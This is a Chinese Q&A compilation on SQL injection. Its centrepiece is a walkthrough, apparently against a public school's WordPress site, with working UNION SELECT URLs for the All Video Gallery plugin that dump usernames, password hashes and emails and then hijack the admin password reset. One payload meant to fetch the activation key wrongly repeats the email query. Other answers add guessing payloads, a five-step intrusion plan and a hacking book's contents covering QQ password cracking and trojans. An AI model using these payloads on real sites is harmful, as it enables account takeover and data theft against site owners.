⑴ 模擬sql注入
這個比如說:
1的ASCII碼是49
我在你的地址上寫(char)49
那麼你將這個參數取過去,做判斷。實際上在你的程序中(char)49已經轉化成了1
那麼判斷通過。
你的程序就會將(char)49進行插入操作。要不插入了要不包錯 這也是一種SQL注入
⑵ 自己搭建環境做sql注入實驗的問題
資料庫裝在虛擬機
tomcat
⑶ 如何進行SQL注入攻擊
SQL注入,就是通過把SQL命令插入到Web表單提交或輸入域名或頁面請求的查詢字元串,最終達到欺騙伺服器執行惡意的SQL命令,首先你要熟悉SQL語句和語法
猜表名
And (Select count(*) from 表名)<>0
猜列名
And (Select count(列名) from 表名)<>0
也可以這樣
and exists (select * from 表名)
and exists (select 列名 from 表名)
⑷ 如何sql注入漏洞攻破linux基礎web
SQL注入的基本原理
sql注入成因主要是對頁面參數沒有進行非法字元校驗導致,比如說一個訂單頁面要顯示某個客戶的所有訂單列表,這個頁面的地址可能是http://xxx.com/list.php?customID=3,我們推理,這樣頁面的後台處理的sql應該是這樣的:
select * form custom_order where custom_id = {$_GET['customID']}
按正常情況下,這里的接收的參數{$_GET['customID']}的值應該是傳入的值3,這樣頁面就能正確的把所有客戶ID等於3的訂單信息顯示到頁面上。但是,如果這個參數被人惡意改成了如下形式:
http://xxx.com/list.php?customID=-1 union select 1,2,3,user,5,passwd,7,8,9,10 from admin
按這樣的參數拼裝成的sql就成了這樣:
select * form custom_order where custom_id = -1 union select 1,2,3,user,5,passwd,7,8,9,10 from admin
這樣注入惡意sql後,訂單列表頁顯示的就不是訂單信息了,而是資料庫中用戶的名稱和密碼,或者任意其它想要的信息。下面我們就按照這個原理來一步一步的獲取這個公立學校網站的管理員用戶名,管理員郵箱地址,通過郵箱重置管理員密碼,登錄超級管理員後台。
All Video Gallery插件的漏洞簡介
安裝了All Video Gallery插件的Wordpress博客里會有這樣的一個地址:
http://xxx.com/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=11
訪問這個頁面會顯示一些配置信息,問題就出在pid這個參數上,程序後台顯然沒有嚴格檢查這個參數,我們將利用這個參數進行sql注入。
WordPress是一個開源的平台,我們很容易弄清楚用戶表的表名是wp_users,存放用戶名,密碼,郵件地址的欄位分別是user_login,user_pass,user_email,我們下面將要把用戶信息表注入進去。
獲取超級管理員用戶名
為了獲取用戶表中的用戶名,我們注入的sql是這樣的:
http://xxx.com/wp-content/plugins/all-video-gallery/config.php?vid=11&pid=1&pid=-1
union select
1,2,3,4,group_concat(user_login,0x3a,user_pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41
from wp_users
在瀏覽器里輸入上面的地址,頁面上會顯示下面的信息:
獲取超級管理員郵件地址
我們可以直接獲取用戶的密碼,但很顯然,密碼都是加密的,無法使用,我們這里使用另外一種思路,先獲取用戶的郵件地址,然後使用這個郵件重置用戶的密碼。
要獲取郵件地址,我們需要將上面的sql中的欄位名改成user_email:
http://xxx.com/wp-content/plugins/all-video-gallery/config.php?vid=11&pid=1&pid=-1
union select
1,2,3,4,group_concat(user_login,0x3a,user_email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41
from wp_users
在瀏覽器里輸入上面的地址,頁面上會顯示下面的信息:
重置管理員密碼
WordPress的後台登陸地址是http://xxx.com/wp-login.php,這個地址是可以公共訪問的,我們進入這個頁面後,點擊Lost your password?鏈接,輸入上面獲取的管理員郵件。
這樣做了之後,Wordpress會向這個郵件地址發送一封含有激活碼的密碼重置地址。我們無法登陸這個郵箱獲取這個地址,但我們可以使用上面同樣
的方法獲取這個激活碼,自己拼裝出密碼重置地址。存放激活碼的欄位是user_activation_key,我們的sql注入地址改成下面這樣:
http://xxx.com/wp-content/plugins/all-video-gallery/config.php?vid=11&pid=1&pid=-1
union select
1,2,3,4,group_concat(user_login,0x3a,user_email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41
from wp_users
在瀏覽器里輸入上面的地址,頁面上會顯示下面的信息:
有了激活碼,我們就可以拼裝出裝置密碼的地址了:
http://xxx.com/wp-login.php?action=rp&key=resetkey&login=username
利用這個地址進入重置密碼頁面:
總結
我們的黑客行動到此基本上是大功告成,但事實上我並沒有去執行最後一步。本文的目的不是要告訴人們如何進行黑客攻擊,而是要提醒大家防範安全漏洞,
所謂知己知彼,方能百戰不殆,程序員應當對基本的黑客攻擊方式有一些了解,針對性的在編程時避免造成類似sql注入的安全漏洞,構築更健壯的軟體。
⑸ 學了理論上的sql注入如何去實踐練習
.....不是所有網站都有注入漏洞的,現在很多同學都學會了使用SQL注入
各位站長們也都學會了堵漏洞,所以現在並不容易找到漏洞網站,並不是那些工具不好,而是真的沒漏洞,這也是沒辦法的事,再好的工具也找不到
⑹ 黑客成長日記的作品目錄
上網被黑日記.
日記1:遭遇「流氓」與神秘人
一、流氓軟體事件
二、流氓軟體特點
三、手工清除流氓軟體
四、手工查殺3448惡意軟體
五、手工清除超級流氓「飄雪」
日記2:初遇黑客
一、黑客的由來
二、黑客常見的攻擊手段
三、黑客精神與守則
四、中國黑客簡史
菜鳥黑客日記
日記1:windows密碼堡壘攻破記
一、最簡單的密碼破解方法
二、修改屏保文件法
三、軟體破解法
日記2:破解雙重登錄驗證密碼
一、syskey雙重登錄密碼驗證
二、取消syskey啟動密碼
.三、密碼鑰匙盤的製作
四、破解syskey加密
日記3:強大的破解工具
日記4:機房中的用戶許可權提升戰
一、csrss本地溢出提升用戶許可權
二、win鍵盤提升許可權
日記5:花心女友現形——免qq密碼看聊天記錄
一、「qq聊天記錄查看器」偷窺聊天記錄
二、「qq免密碼登錄器」查看聊天記錄
日記6:密碼破解狂人——論壇、郵箱、上網賬號等密碼破解
一、論壇、郵箱密碼統統拿
二、清除ie分級審查密碼
三、查看星號密碼
四、查看寬頻撥號密碼
五、恢復ie未保存的郵箱密碼
六、清除foxmall賬號密碼
七、找出adsl登錄密碼
日記7:加密文檔破解記
一、加密軟體真相
二、破解「e-神加密文件夾」
三、破解「紫電文件夾加密保護神」加密文檔
四、破解「高強度加密大師」加密文檔
五、強制刪除「高強度加密大師」保護文件
六、「文件夾嗅探器「破解加密文件
七、「文件夾加密超級大師」解密測試
攻防平台搭建日記
日記1:黑客技術訓練營搭建記
一、黑客技術訓練場所——虛擬機
二、vmware虛擬機
三、virtual pc虛擬機
日記2:我的第一個網站
一、網站攻擊學習園地
二、在虛擬機上架設iis伺服器
三、在虛擬機中安裝網站
日記3:欲練神功,揮刀自「攻」——虛擬機中的ipc$入侵實驗
一、ipc$入侵簡介
二、ipc$連接的要求
三、關於windows操作系統的默認共享
四、在虛擬機中搭建ipc$入侵環境
五、在虛擬機中的ipc$入侵學習
區域網黑客日記
日記1:近水樓台先得月——共享入侵
一、smb共享介紹
二、x-scan掃描windows共享主機
三、專用共享資源掃描工具shed
四、虛擬機中的windows共享入侵實例
日記2:和胖子開個玩笑——ip攻擊小記
一、ip攻擊概念及分類
二、ip沖突攻擊利器——網路特工
三、ip欺騙攻擊
四、arp式ip地址沖突攻擊
日記3:遭遇「終結者」攻擊
一、斷網攻擊
二、網速限制
三、禁用下載
四、禁止打開網頁
五、攻擊網路聊天軟體
六、反p2p終結者
七、讓p2p終結者改邪歸正
日記4:嗅探的季節,密碼大豐收
一、何為嗅探
二、嗅探工具的使用
三、遠程嗅探
四、交換機環境下的網路嗅探
日記5:整蠱黑心網吧——突破網吧限制管理
一、突破網吧下載限制
二、突破限制查看硬碟
三、使用軟體突破網吧限制
四、網吧中的一次綜合破解流程
五、突破萬象2006
互聯網黑客日記
日記1:公主復仇——qq破解記
一、qq密碼本地破解
二、遠程破解qq密碼
三、qq傳送木馬程序的絕招
四、完美隱藏和偽裝qq ip地址
日記2:匡扶正義的行動——主機入侵記
一、找出目標的ip地址
二、掃描目標主機的漏洞
三、利用漏洞進行溢出攻擊
日記3:花心男友罪行記錄——入侵後的操作..
一、上傳木馬後門
二、獲取管理員密碼與賬號後門
三、遠程3389終端的開啟與偽裝
四、搞定殺毒軟體,防火牆
五、後門上傳與服務偽裝
六、控制內網
七、清除入侵記錄
日記4:入侵後的思考
一、遠程獲取管理員密碼
二、賬號克隆與隱藏
三、使用鐵血ca克隆賬號
四、突破防火牆與tcp/ip篩選
五、突破windows xpsp2「安全中心」
日記5:刻苦練技——遠程溢出攻擊
一、遠程溢出攻擊概念
二、wins ms04045遠程溢出漏洞
三、windows ssllibrary遠程溢出攻擊
四、mso 5-051遠程溢出漏洞
日記6:學習筆記——應用軟體的遠程溢出
一、ccproxy6.1/6.2遠程溢出攻擊
二、serv-uftpserver遠程溢出攻擊
三、serv-uftpserver遠程拒絕服務攻擊
四、ildap服務遠程溢出攻擊imail server
五、foxmail遠程溢出攻擊
日記7:木馬偽裝術
一、木馬捆綁
二、木馬加殼
三、修改木馬程序特徵碼
四、rootkit徹底隱藏木馬程序
五、製作網頁木馬程序
六、製作電子書木馬程序
日記8:黑客大戰——網站攻擊實戰
一、mybloggie博客漏洞介紹
二、mybloggie博客漏洞注入攻擊
三、入侵控制伺服器
四、「僵屍網路」——新型ddos攻擊
五、利用challengecollapsar進行攻擊
日記9:黑客揚名被捕記
一、動網論壇掛馬
二、vbulletin3論壇注入漏洞
三、入侵bbsxp論壇,巧獲webshell
四、入侵phpwind論壇
「准」黑客的轉型日記
日記1:遭遇入侵
一、系統後門與賬號克隆
二、檢測與恢復克隆賬號
三、恢復被克隆的系統內置賬號——最強大的工具mt
四、監控cmd遠程溢出入侵
日記2:木馬檢測與清除記
一、系統網路之門——初識埠
二、windows中的埠查看器
三、誰開放了「埠」
四、用netstat查看埠進程
五、圖形化的埠管理工具
六、監視埠的一舉一動
七、找出木馬進程
八、結束木馬進程
日記3:正版殺毒軟體與木馬風波
一、手工清除木馬病毒流程
二、清除所有啟動項目
三、查找可疑進程
四、結束木馬進程
五、刪除木馬文件
六、慎重強行刪除木馬
七、善後工作
日記4:安全防範
一、阻止木馬病毒攻擊的安全防範
二、用tcp/ip策略關閉本機埠
三、使用ipseccmd工具自動關閉危險埠
四、安裝升級第三方殺毒軟體及防火牆
五、在線安全檢測
日記5:宿舍網突現危機
一、密碼的設置及保護
二、密碼安全性
三、密碼輸入用「賬號守護專家」
四、advancedpassword generator生成強壯密碼
日記6:維護校園網
一、網路頑疾,ip地址攻擊
二、追查ip地址盜用者信息
三、防範ip地址盜用
四、防範arp欺騙
五、備份網路和帳號信息
日記7:試手計算機愛好者協會
一、sql注入與防範
二、sql注入的防範原理
三、密碼登錄框sql注入防範
四、表單sql注入防範——限制字元串長度
五、url鏈接類sql注入防範——參數類型過濾
六、使用「sql通用防注入程序」防範sql注入攻擊
七、加密資料庫,對用戶輸入「消毒」
八、防範暴庫下載
九、管理員頁面注入防範——session驗證
十、在php網頁中防範sql注入的方法
職業規劃日記
日記1:職業思考——網路安全技術認證
一、網路安全師——未來的十大熱門職業之一
二、網路安全技術認證考試分類
三、四種安全認證介紹比較
日記2:確立發展目標——cisco網路技術圖書推薦
一、cisco網路技術學院簡介
二、cisco網路技術學院系列圖書
三、cisco職業認證培訓系列圖書
附錄:黑客必會命令...
⑺ 誰給講講SQL注入攻擊的步驟
動態網頁中可能只有一個參數,有時可能有N個參數,有時是整型參數,有時是字元串型參數,不能一概而論。
⑻ 在vmware虛擬機上做一下針對資料庫的注入攻擊實驗,怎樣搭建環境建立網站
這個真的不知道..........
⑼ 怎麼搭建虛擬機測試SQL注入攻擊
安裝虛擬機-------在虛擬機上安裝操作系統---------安裝各種軟體
一步一步來,不會的話可以在網上找一個視頻教程!
⑽ 求教誰給講講SQL注入攻擊的步驟
第一步:SQL注入點探測。探測SQL注入點是關鍵的第一步,通過適當的分析應用程序,可以判斷什麼地方存在SQL注入點。通常只要帶有輸入提交的動態網頁,並且動態網頁訪問資料庫,就可能存在SQL注入漏洞。如果程序員信息安全意識不強,採用動態構造SQL語句訪問資料庫,並且對用戶輸入未進行有效驗證,則存在SQL注入漏洞的可能性很大。一般通過頁面的報錯信息來確定是否存在SQL注入漏洞。
第二步:收集後台資料庫信息。不同資料庫的注入方法、函數都不盡相同,因此在注入之前,我們先要判斷一下資料庫的類型。判斷資料庫類型的方法有很多,可以輸入特殊字元,如單引號,讓程序返回錯誤信息,我們根據錯誤信息提示進行判斷,還可以使用特定函數來判斷。
第三步:猜解用戶名和密碼。資料庫中的表和欄位命名一般都是有規律的,通過構造特殊的SQL語句在資料庫中依次猜解出表名、欄位名、欄位數、用戶名和密碼。
第四步:查找Web後台管理入口。Web後台管理通常不對普通用戶開放,要找到後台管理的登錄網址,可以利用Web目錄掃描工具快速搜索到可能的登錄地址,然後逐一嘗試,便可以找到後台管理平台的登錄網址。
第五步:入侵和破壞。一般後台管理具有較高許可權和較多的功能,使用前面已破譯的用戶名、密碼成功登錄後台管理平台後,就可以任意進行破壞,比如上傳木馬、篡改網頁、修改和竊取信息等,還可以進一步提權,入侵Web伺服器和資料庫伺服器。